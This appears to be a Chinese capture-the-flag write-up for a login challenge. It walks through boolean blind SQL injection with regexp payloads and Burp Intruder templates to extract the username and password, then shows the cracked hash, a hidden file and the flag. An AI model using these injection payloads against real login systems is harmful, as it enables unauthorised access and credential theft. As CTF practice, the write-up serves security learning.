用户名admin’ or ‘1’=’1 密码随便输
弹出密码错误
再试试admin’ or ‘1’=’2
弹出用户不存在
说明这里存在注入点,而且是盲注
构造payload:admin’ or user_n3me regexp ‘^a’%23 (使用java的正则表达式来进行盲注,用#的url编码%23来注释掉后面的内容,^表示匹配开始的位置,$表示匹配结束的位置) 密码随意
利用intruder 进行爆破,(user_n3me和p3ss_w0rd很特别,猜测为当前数据库中的两个表格)
用户名爆破语句“
username=admin' or user_n3me regexp '^§a§'%23&password=1111
密码爆破语句:
username=admin' or p3ss_w0rd regexp '^§a§'%23&password=1111
爆破出来用户名为bctf3dm1n, 密码2bfb1532857ddc0033fdae5bde3facdf
密码解密为:adminqwe123666
登录成功之后:存在 .bctfg1t 隐藏文件,
flag.php.a17d89文件打开就是
<?php
echo '71ec9d5ca5580c58d1872962c596ea71.php';
//niubi 666
?>
flag{a491cf3a-1a4e-405c-980f-ed1dc7a963a6}